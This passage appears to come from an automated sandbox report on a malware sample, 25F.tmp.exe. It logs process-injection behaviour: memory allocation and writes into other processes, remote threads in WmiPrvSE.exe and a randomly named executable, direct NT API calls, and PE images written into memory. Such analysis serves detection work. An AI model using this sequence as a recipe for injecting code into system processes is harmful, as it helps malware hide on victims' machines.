            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 22_2_001942E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,22_2_001942E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 23_2_008442E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,23_2_008442E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 25_2_004042E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,25_2_004042E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 26_2_008242E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,26_2_008242E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 27_2_000942E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,27_2_000942E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 29_2_005D42E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,29_2_005D42E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 30_2_000942E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,30_2_000942E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 31_2_009142E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,31_2_009142E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 32_2_003942E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,32_2_003942E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 33_2_000942E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,33_2_000942E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 34_2_002242E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,34_2_002242E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 35_2_001542E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,35_2_001542E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 36_2_007F42E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,36_2_007F42E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 37_2_002542E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,37_2_002542E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 38_2_002642E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,38_2_002642E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 39_2_003F42E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,39_2_003F42E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 40_2_003F42E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,40_2_003F42E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 41_2_002842E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,41_2_002842E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 42_2_001042E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,42_2_001042E0
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe EIP: C55C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 3D5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 185C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 385C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 415C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 1B5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 355C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 315C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 385C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 105C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 105C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 225C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 325C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 515C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 195C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 845C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 405C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 825C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 95C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 5D5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 95C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 915C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 395C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 95C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 225C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 155C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 7F5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 255C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 265C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 3F5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 3F5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 285C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 105C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 265C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 5D5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 1C5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 235C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 95C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 255C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 105C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 2A5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 275C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 2B5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 95C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 2D5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 155C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 755C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 125C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 555C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 255C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 2E5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 395C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 1B5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 105C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 385C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 825C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 385C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 3E5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 285C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 5F5C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Thread created: unknown EIP: 2B5C50
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 8A5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 105C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 1D5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 185C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 1C5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 8E5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 415C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 145C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 3A5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 165C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 145C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 195C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: unknown EIP: 105C50Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtQueryInformationProcess: Direct from: 0x774CFAFA
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtQuerySystemInformation: Direct from: 0x774D20DE
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtClose: Direct from: 0x774CFA02
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtSetTimer: Direct from: 0x774D021A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtOpenFile: Direct from: 0x774CFD86
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtSetInformationThread: Direct from: 0x774E9893
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtCreateMutant: Direct from: 0x774D07BE
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtOpenKeyEx: Direct from: 0x774CFA4A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtAllocateVirtualMemory: Direct from: 0x774CFAE2
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtResumeThread: Direct from: 0x774D008D
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtOpenKeyEx: Direct from: 0x774D103A
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | NtUnmapViewOfSection: Direct from: 0x774CFCA2
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | NtDelayExecution: Direct from: 0x774CFDA1
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtSetInformationProcess: Direct from: 0x774CFB4A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtAdjustPrivilegesToken: Direct from: 0x774CFEE2
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | NtSetInformationThread: Direct from: 0x774CF9CE
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtMapViewOfSection: Direct from: 0x774CFC72
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtCreateThreadEx: Direct from: 0x774D08C6
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtDeviceIoControlFile: Direct from: 0x774CF931
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtQueryValueKey: Direct from: 0x774CFACA
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtTerminateThread: Direct from: 0x774D00A6
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtOpenSection: Direct from: 0x774CFDEA
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtProtectVirtualMemory: Direct from: 0x774D005A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtSetInformationThread: Direct from: 0x774CFF12
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtWriteVirtualMemory: Direct from: 0x774CFE36
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtQueryAttributesFile: Direct from: 0x774CFE7E
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtReadVirtualMemory: Direct from: 0x774CFEB2
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtSetTimer: Direct from: 0x774E98D5
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | NtTerminateProcess: Direct from: 0x774CFCD2
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | NtQuerySystemInformation: Direct from: 0x774CFDD2
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Users\user\Desktop\25F.tmp.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Users\user\Desktop\25F.tmp.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: C50000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3D0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 350000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 310000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 320000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 510000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 840000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000 value starts with: 4D5A
